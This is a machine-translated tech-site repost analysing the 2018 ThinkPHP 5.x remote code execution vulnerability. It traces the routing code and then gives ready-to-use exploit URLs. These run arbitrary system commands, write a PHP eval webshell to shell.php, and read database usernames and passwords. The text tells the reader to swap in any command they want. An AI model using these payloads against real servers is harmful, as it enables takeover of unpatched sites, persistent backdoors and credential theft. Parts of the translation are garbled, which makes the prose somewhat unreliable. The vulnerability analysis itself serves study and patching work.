In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-05 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
On December 11, 2018, exploit-db updated a remote code execution vulnerability in the thinkphp framework
Exploit address: https://www.exploit-db.com/exploits/45978
Due to insufficient detection of the controller name by the framework, getshell is not enabled without mandatory routing
Scope of impact of vulnerability
Thinkphp 5.1.0-5.1.31
Thinkphp 5.0.5-5.0.23
Installation:
Download address http://www.thinkphp.cn/donate/download/id/1125.html
Download and decompress it in the / var/www/html/ directory.
Loophole analysis
/ number of thinkphp/library/think/App.php lines: 120
We can see that route detection is done through the self::routerCheck function
We can see that we enter the $request- > path () function again.
/ thinkphp/library/think/Request.php lines: 416 lines
Enter the pathinfo () function and continue to trace to line 384
Config::get ('var_pathinfo') is the parameter set in the configuration file. The default value is s. Get the key value from GET and assign it to $path in routeCheck.
Let's go back to the number of App.php lines: 606
Route detection will be performed here. After checking $check, you will enter the else branch to import the route configuration, and then check that the routing url scheduling result is $result. If the scheduling fails and the mandatory route $must is enabled, the route is reported to be invalid, and then enter the Route::parseUrl function to resolve the operation according to $path (custom url).
Start tracking the parseUrl function
/ number of thinkphp/library/think/Route.php lines: 1208
Number of lines entering parseUrlPath function: 1275
Here we can see that the url address of the module / controller / operation is split into an array to return (a little heavy without a good picture) the number of lines: 1217
We can see that the returned result is assigned to $path, the routing information is extracted and encapsulated into $route, and finally returned
Number of thinkphp/library/think/App.php rows: 120
Number of lines entering self::exec function: 445
We can see that the function of the module / controller / operation is self::module
Start tracking module function lines: 494
We can see that according to $config ['app_multi_module'] to enter the multi-module deployment, $bind is NULL, and then enter the elseif branch to determine whether the module is in the prohibited list $config [' deny_module_list'], and if mmodule exists, $available = true, no exception will be thrown.
The final return value of the module function finds that $controller is not filtered, so it should be think\ app, that is, return self::invokeMethod ($call, $vars).
Number of lines entering self::invokeMethod function: 329
The $call put in at this time is $method, which is an array. The first element is a think\ App object, and the second element is the string invokefunction that calls the method name, and then gets the corresponding method under this object by reflecting ReflectionMethod.
Then get the passed parameter, that is, payload, through the function $args = self::bindParams ($reflect, $vars)
Finally, call reflection $reflect- > invokeArgs ($args); and pass the Payload array into the reflection object function invokeFunction to complete the code execution.
At this point, the ThinkPHP remote code execution vulnerability analysis is complete.
-
Vulnerability exploitation
Http://xxx.xxx.xxx( here is your domain name) / public/index.php?s=index/think\ app/invokefunction&function=call_user_func_array&vars [0] = system&vars [1] [] = whoami
Remote code execution command: whoami (the whoami after the link can be changed to the command you want to execute, special symbols can be transcoded by url)
Http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Write out the information of phpinfo through phpinfo function
Http://xxx.xxx.xxx/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22snowwolf%22])?^%3E%3Eshell.php
Write to shell
Http://xxx.xxx.xxx/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
Also display phpinfo
Http://xxx.xxxx.xxx/thinkphp/public//?s=.|think\config/get&name=database.username
Database user name (the following username is changed to password as the database password)
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.